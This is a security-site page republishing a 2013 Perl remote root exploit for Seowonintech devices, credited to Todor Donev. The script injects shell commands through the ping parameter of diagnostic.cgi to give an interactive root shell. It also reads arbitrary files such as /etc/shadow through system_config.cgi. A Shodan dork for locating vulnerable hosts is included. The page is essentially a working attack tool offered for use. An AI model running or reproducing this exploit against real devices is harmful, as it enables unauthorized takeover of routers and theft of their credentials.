首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Seowonintech Remote Root Exploit
来源:todor dot donev@googlemail.com 作者:Donev 发布时间:2013-06-24  
#!/usr/bin/perl
#       
#  [+] Seowonintech all device remote root exploit v2
# =====================================================
# author:                 | email:
# Todor Donev  (latin)    | todor dot donev 
# Òîäîð Äîíåâ  (cyrillic) | @googlemail.com    
# =====================================================
# type:    | platform:    | description:
# remote   | linux        | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite 
# colleagues and all my friends that support me. 
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork: 
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
#    Stop Monsanto Stop Monsanto Stop Monsanto
#
#       FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder 
# who was sentenced to two years in jail by Nacka 
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.
   
use LWP::Simple qw/$ua get/;
my $host  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
     usg();
     exit;
}
print "[+] Seowonintech all device remote root exploit\n";
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";
print "[+] Checking before attack..\n";
if($res->status_line != 200){
     print "[+] diagnostic.cgi Status: ".$res->status_line."\n";
     }else{
     print "[o] Victim is ready for attack.\n";
     print "[o] Status: ".$res->status_line."\n";  
     if(defined $res =~ m{selected>4</option>}sx){
     print "[+] Connected to $ARGV[0]\n";
     print "[+] The fight for the future Begins\n";
     print "[+] Exploiting via remote command execution..\n";
     print "[+] Permission granted, old friend.\n";
     &rce;
     }else{
     print "[!] Warning: possible vulnerability.\n";
     exit;
    }   
  }
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";
if($res1->status_line != 200){
     print "[+] system_config.cgi Status: ".$res1->status_line."\n";
     exit;
     }else{
     print "[+] Trying to attack via remote file disclosure release.\n";
     if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){
     print "[+] Victim is ready for attack.\n";
     print "[+] Connected to $ARGV[0]\n";
     print "[o] Follow the white cat.\n";
     print "[+] Exploiting via remote file dislocure..\n";
     print "[+] You feeling lucky, Neo?\n";
     &rfd;
     }else{
     print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";
     exit;
    }
  }
sub rfd{
while(1){ 
     print "# cat ";
     chomp($file=<STDIN>);
     if($file eq ""){ print "Enter full path to file!\n"; }
     $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
     $data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
     $data =~ s/Null/File not found!/gs;
     if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
     print $1."\n";
     }
   }
}
sub rce{
while(1){ 
     print "# ";
     chomp($rce=<STDIN>);
     $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
     $rce =~ s/\|/\;/;
     if($rce eq ""){print "enter Linux command\n";}
     if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}
     $data=get($bug) || die "[-] Error: $!\n";
     if (defined $data =~ m{(\s.*) Content-type:}sx){
     $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
     $result =~ s/ loss\n//;     
     $result =~ s/ ms\n//;
     print $result;
    }
  }
}
sub usg
{
     print " [+] Seowonintech all device remote root exploit\n";
     print " [!] by Todor Donev todor dot donev @ googlemail.com\n";
     print " [?] usg: perl $0 <victim>\n";
     print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";
     print " [1] exmp xpl RCE: # uname -a :)\n";
     print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sami FTP Server 2.0.1 RETR Den
·LibrettoCMS File Manager Arbit
·ZPanel 10.0.0.2 htpasswd Modul
·HP System Management Homepage
·Novell Client 4.91 SP4 nwfs.sy
·Mozilla Firefox 21.0 Denial Of
·MediaCoder PMP Edition 0.8.17
·FreeBSD 9.0+ Privilege Escalat
·Mediacoder .lst SEH Buffer Ove
·PEiD 0.95 Memory Corruption
·Mediacoder .m3u SEH Buffer Ove
·AudioCoder 0.8.22 - Direct Ret
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved